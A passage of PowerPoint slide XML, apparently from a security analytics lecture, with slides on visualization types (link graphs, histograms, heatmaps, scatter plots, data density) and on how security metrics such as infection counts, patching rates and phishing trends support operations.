                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A61CA07F-6ED1-9F45-958F-8405D367F45B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Supporting analysis through visualization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64514" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F58835D9-C8E0-5140-A713-2E706EFCE9A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Allows huge amounts of information to become comprehensible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Useful in investigation and other analyses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Charts and graphs: static and interactive tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Standard types of visualizations to choose from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Specialized visualizations tailored for particular use-cases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0ECA5EA-E35F-C94D-8C03-36B509E3C251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="273050"/>
            <a:ext cx="8229600" cy="731838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="44196"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="88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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Visualizaton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: link graphs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66562" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F42B0401-51E7-6C48-BDC6-C52879EF68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7050" y="1484784"/>
            <a:ext cx="8089900" cy="397668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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F68123-6CCC-4D49-9256-066B4157CEA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="273050"/>
            <a:ext cx="8229600" cy="731838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="44196"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="88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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Time-based visualization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68610" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8AD24D0-0839-F94D-940D-445AE96E5A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2122488"/>
            <a:ext cx="8229600" cy="29416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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2829179A-8CD9-7D4B-B3FB-7563BF92262E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="273050"/>
            <a:ext cx="8229600" cy="731838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="44196"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="88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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Visualization: histograms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70658" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABB8E2F-4246-364B-BF0F-A6CFBFD960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3925" y="1293813"/>
            <a:ext cx="4754563" cy="49911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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF07F05F-0793-0545-ACB5-DCB1DD0179C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="273050"/>
            <a:ext cx="8229600" cy="731838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="44196"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="88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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Visualization: heatmaps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72706" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC2F4E8-ADD2-A248-9C5B-6FE9F71CC0E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6300" y="1604963"/>
            <a:ext cx="7389813" cy="397668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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB64FCE-2CBD-AE44-A0FA-249267555746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="273050"/>
            <a:ext cx="8229600" cy="731838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="44196"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="88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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Visualization: scatter plots</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74754" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE65C048-F0D8-CA4C-A22B-AED60415E7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722438"/>
            <a:ext cx="8229600" cy="37401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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F42E3376-D96B-AD40-AFC4-8255D357D99C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="273050"/>
            <a:ext cx="8229600" cy="731838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="44196"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="88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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data density in visualizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76802" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698510B8-D8D2-D940-8FAA-6458F55DF1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7813" y="1209675"/>
            <a:ext cx="6048375" cy="48720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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8965F6-4E58-244C-9D64-85AC6FE80512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metrics Collection Supports Operations </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78850" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5DD6E5-52FE-C640-A1AB-93CBE57700FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8693150" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="804863" indent="-460375">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Lst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Not generally actionable information, but current and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>historical status </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reveal security status, operational effectiveness, and trends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How secure is your organization? Is it improving or slipping?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How many machines were infected? What is remediation rate? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How effective is the department when applying patches </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to vulnerable systems? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Are phishing attacks growing or shrinking?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Standardized metrics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aid in comparisons between organizations, sectors, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or countries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No worldwide standards yet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE050C43-08BE-F84A-B109-EBC98E25946D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
